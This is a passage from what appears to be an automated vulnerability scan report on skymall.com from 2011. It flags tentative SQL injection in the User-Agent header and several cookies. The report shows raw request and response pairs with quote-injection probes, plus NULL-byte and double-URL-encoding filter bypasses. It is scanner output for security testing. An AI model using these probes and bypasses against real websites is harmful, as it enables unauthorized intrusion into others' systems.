Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^''; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:40:20 GMT
Connection: close
Set-Cookie: JSESSIONID=97C9D88E0F29D4B189B73B1426DC318B.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:20 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:20 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:20 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:20 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497620543~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:40:20 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.8. http://www.skymall.com/shopping/dept.htm [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:41:41 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:41:41 GMT
Connection: close
Set-Cookie: JSESSIONID=0C8A6AA56CC73D3CBEEF37727E41AAF6.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:41 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:41 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:41 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:41 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497701387~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:41:41 GMT
Content-Length: 174579


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.9. http://www.skymall.com/shopping/dept.htm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337%00'; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:41:07 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337%00''; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:41:07 GMT
Connection: close
Set-Cookie: JSESSIONID=661C6910241139CDE77C4E8EDA9EF40B.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:07 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:07 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:07 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:07 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497667397~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:41:07 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.10. http://www.skymall.com/shopping/dept.htm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152'; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:40:57 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152''; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:40:58 GMT
Connection: close
Set-Cookie: JSESSIONID=F51A1FF59B77AD5F0673B58BB04BD366.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:57 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:57 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:57 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:57 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497657780~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:40:57 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.11. http://www.skymall.com/shopping/dept.htm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:40:41 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:40:42 GMT
Connection: close
Set-Cookie: JSESSIONID=30CAE16897945E36E06F0CB4739F0EE9.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:42 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:42 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:42 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:42 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497642619~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:40:42 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.12. http://www.skymall.com/shopping/dept.htm [cmRS cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The cmRS cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cmRS cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1'

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:41:24 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1''

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:41:24 GMT
Connection: close
Set-Cookie: JSESSIONID=E9E120E8CE495B9E84C7ECE21566D24E.menthuv5web1; Path=/shopping
